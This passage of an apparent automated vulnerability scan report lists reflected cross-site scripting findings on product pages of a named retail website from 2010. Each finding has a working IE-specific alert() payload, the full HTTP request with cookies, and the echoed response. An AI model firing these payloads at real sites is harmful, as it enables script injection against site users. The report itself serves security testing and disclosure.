The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc708"style%3d"x%3aexpression(alert(1))"e660e51f89c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc708"style="x:expression(alert(1))"e660e51f89c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/Black-6.5-foot-HDMI-HDMI-Cables-Set-of-2/2276116/product.html?bc708"style%3d"x%3aexpression(alert(1))"e660e51f89c=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:30 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:30 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:30 GMT; Path=/
Set-Cookie: mxcproclicks=2276116|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:30 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408310360:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=34
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107100

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Bl
...[SNIP]...
<input type="hidden" name="bc708"style="x:expression(alert(1))"e660e51f89c" value="1"/>
...[SNIP]...

2.95. http://www.overstock.com/Electronics/Eforcity-Black-2-port-USB-Car-Charger-w-LED-Light/4512322/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/Eforcity-Black-2-port-USB-Car-Charger-w-LED-Light/4512322/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0ec2"style%3d"x%3aexpression(alert(1))"fe49622d448 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0ec2"style="x:expression(alert(1))"fe49622d448 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/Eforcity-Black-2-port-USB-Car-Charger-w-LED-Light/4512322/product.html?a0ec2"style%3d"x%3aexpression(alert(1))"fe49622d448=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:29 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:29 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408309221:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4512322|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:29 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:29 GMT; Path=/
Keep-Alive: timeout=5, max=38
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 114522

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Ef
...[SNIP]...
<input type="hidden" name="a0ec2"style="x:expression(alert(1))"fe49622d448" value="1"/>
...[SNIP]...

2.96. http://www.overstock.com/Electronics/Leather-Case-and-Protective-Kit-for-iPod-iTouch/4155506/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/Leather-Case-and-Protective-Kit-for-iPod-iTouch/4155506/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4266b"style%3d"x%3aexpression(alert(1))"26c79062f8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4266b"style="x:expression(alert(1))"26c79062f8c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/Leather-Case-and-Protective-Kit-for-iPod-iTouch/4155506/product.html?4266b"style%3d"x%3aexpression(alert(1))"26c79062f8c=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:13 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:13 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=4155506|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:13 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408293335:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:13 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=45
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109796

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Le
...[SNIP]...
<input type="hidden" name="4266b"style="x:expression(alert(1))"26c79062f8c" value="1"/>
...[SNIP]...

2.97. http://www.overstock.com/Electronics/Lithium-Coin-Battery-CR2032-Pack-of-5/3521764/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/Lithium-Coin-Battery-CR2032-Pack-of-5/3521764/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff271"style%3d"x%3aexpression(alert(1))"32c240f2498 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff271"style="x:expression(alert(1))"32c240f2498 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/Lithium-Coin-Battery-CR2032-Pack-of-5/3521764/product.html?ff271"style%3d"x%3aexpression(alert(1))"32c240f2498=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:14 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:14 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=3521764|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:14 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408294315:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:14 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=8
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109399

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Li
...[SNIP]...
<input type="hidden" name="ff271"style="x:expression(alert(1))"32c240f2498" value="1"/>
...[SNIP]...

2.98. http://www.overstock.com/Electronics/Samsung-DVD-V9800-1080p-Upconverting-DVD-VCR-Player-Refurbished/5131876/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/Samsung-DVD-V9800-1080p-Upconverting-DVD-VCR-Player-Refurbished/5131876/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b94c4"style%3d"x%3aexpression(alert(1))"ef952e6335 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b94c4"style="x:expression(alert(1))"ef952e6335 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/Samsung-DVD-V9800-1080p-Upconverting-DVD-VCR-Player-Refurbished/5131876/product.html?b94c4"style%3d"x%3aexpression(alert(1))"ef952e6335=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:39 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:39 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289408319471:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:39 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5131876|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:39 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=29
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 106787

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Sa
...[SNIP]...
<input type="hidden" name="b94c4"style="x:expression(alert(1))"ef952e6335" value="1"/>
...[SNIP]...

2.99. http://www.overstock.com/Electronics/SanDisk-4GB-SDHC-Memory-Card/2576616/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/SanDisk-4GB-SDHC-Memory-Card/2576616/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f8e7"style%3d"x%3aexpression(alert(1))"b5269568014 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f8e7"style="x:expression(alert(1))"b5269568014 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/SanDisk-4GB-SDHC-Memory-Card/2576616/product.html?9f8e7"style%3d"x%3aexpression(alert(1))"b5269568014=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:42 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:42 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408322246:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=2576616|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:42 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:42 GMT; Path=/
Keep-Alive: timeout=5, max=73
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Sa
...[SNIP]...
<input type="hidden" name="9f8e7"style="x:expression(alert(1))"b5269568014" value="1"/>
...[SNIP]...

2.100. http://www.overstock.com/Electronics/SanDisk-8GB-SDHC-Memory-Card/3158547/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/SanDisk-8GB-SDHC-Memory-Card/3158547/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e49ec"style%3d"x%3aexpression(alert(1))"8a5595016dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e49ec"style="x:expression(alert(1))"8a5595016dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/SanDisk-8GB-SDHC-Memory-Card/3158547/product.html?e49ec"style%3d"x%3aexpression(alert(1))"8a5595016dc=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:28 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:28 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:28 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3158547|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:28 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408308063:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=28
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111790

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>Sa
...[SNIP]...
<input type="hidden" name="e49ec"style="x:expression(alert(1))"8a5595016dc" value="1"/>
...[SNIP]...

2.101. http://www.overstock.com/Electronics/SanDisk-Sansa-Fuze-4GB-MP3-Player-Refurbished/4342765/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/SanDisk-Sansa-Fuze-4GB-MP3-Player-Refurbished/4342765/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea2c2"style%3d"x%3aexpression(alert(1))"84955bdb5b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea2c2"style="x:expression(alert(1))"84955bdb5b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/SanDisk-Sansa-Fuze-4GB-MP3-Player-Refurbished/4342765/product.html?ea2c2"style%3d"x%3aexpression(alert(1))"84955bdb5b4=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
